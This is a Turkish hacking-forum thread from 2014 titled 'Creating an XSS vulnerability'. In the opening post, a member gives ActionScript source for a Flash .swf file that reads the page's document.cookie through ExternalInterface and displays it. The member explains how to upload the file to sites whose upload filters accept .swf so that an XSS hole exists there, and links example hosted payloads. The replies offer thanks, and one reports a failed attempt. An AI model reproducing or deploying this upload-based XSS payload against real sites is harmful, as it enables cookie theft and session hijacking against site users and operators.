> > >
 Twitter'a yolla Google'a yolla Allah'a havale et
 
Konuyu Oyla:
  • Toplam: 2 Oy - Ortalama: 3.5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: XSS Açığı Yaratma
cLowN
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 10
Yaşam Puanı: 14 / 236
Deneyim: 44 / 100
Rep Sayısı: 9
Mesaj Sayısı: 130
Üyelik Tarihi: 19.08.2013
     
Yorum: #1
XSS Açığı Yaratma
16.02.2014 15:09
Arkadaşlar çoğu site upload managerı .php .asp .html... benzeri şeyleri yasaklar filitreden geçirmez kabul ettiği dosyalar .pdf .doc .txt .swf vs olan siteler vardır.Madem sistemde açık yok upload seçenekleri bunlara izin veriyor bizde kendi açığımızı yaparız.Atıyorum bu verceğim kod .swf için yazılmış bir kod

Kod:
package {
import flash.display.*;
import flash.text.*;
import flash.external.ExternalInterface;

public class xss extends Sprite {
public function xss() {
var cook:TextField = new TextField();
var res:String = ExternalInterface.call("function(){return document.cookie;}");
ExternalInterface.call("prompt(document.cookie)");
cook.multiline = true;
cook.wordWrap = true;
cook.autoSize = TextFieldAutoSize.LEFT;
cook.text = res;
addChild(cook);
}
}
}
bu dosyayı .swf formatında sisteme attığınızda örnek olarak veriyorum siteyi http://swfchan.org/2335/xss.swf xss hatası alıyorsunuz böylelikle sistemde kendi açığınızı yaratıyorsunuz.

Ör:
http://www.ziddu.com/viewfile/22413513/xss.swf.html
http://swfchan.org/2335/xss.swf
(Bu konu en son: 16.02.2014 Tarihinde, Saat: 15:10 düzenlenmiştir. Düzenleyen: cLowN.)
Alinti
#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 43
Yaşam Puanı: 1,054 / 1,054
Deneyim: 19 / 100
Rep Sayısı: 1062
Mesaj Sayısı: 3030
Üyelik Tarihi: 04.05.2013
      
Yorum: #2
Cvp: XSS Açığı Yaratma
16.02.2014 15:21
eline sağlık Smile
Çocukken her akşam yatmadan önce Tanrı'ya bana bir bisiklet vermesi için dua ederdim. Bir gün Tanrı'nın çalışma tarzının bu olmadığını anladım. Ertesi gün gittim kendime yeni bir bisiklet çaldım ve her akşam yatmadan önce Tanrı'ya günahlarımı affetmesi için dua ettim.
Alinti
cLowN
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 10
Yaşam Puanı: 14 / 236
Deneyim: 44 / 100
Rep Sayısı:
Mesaj Sayısı: 130
Üyelik Tarihi: 19.08.2013
     
Yorum: #3
Cvp: XSS Açığı Yaratma
16.02.2014 15:28
bişey değil Smile
Alinti
WesT
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 12
Yaşam Puanı: 29 / 295
Deneyim: 83 / 100
Rep Sayısı: 1
Mesaj Sayısı: 190
Üyelik Tarihi: 17.12.2013
     
Yorum: #4
Cvp: XSS Açığı Yaratma
16.02.2014 18:14
eline sağlık Smile
Alinti
L3on4ns
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 6
Yaşam Puanı: 4 / 145
Deneyim: 82 / 100
Rep Sayısı: 0
Mesaj Sayısı: 63
Üyelik Tarihi: 09.12.2013
      
Yorum: #5
Cvp: XSS Açığı Yaratma
16.02.2014 20:11
http://inciswf.com/sezenss.swf denedim olmadı galiba
Alinti
Cevap Yaz



1 Ziyaretçi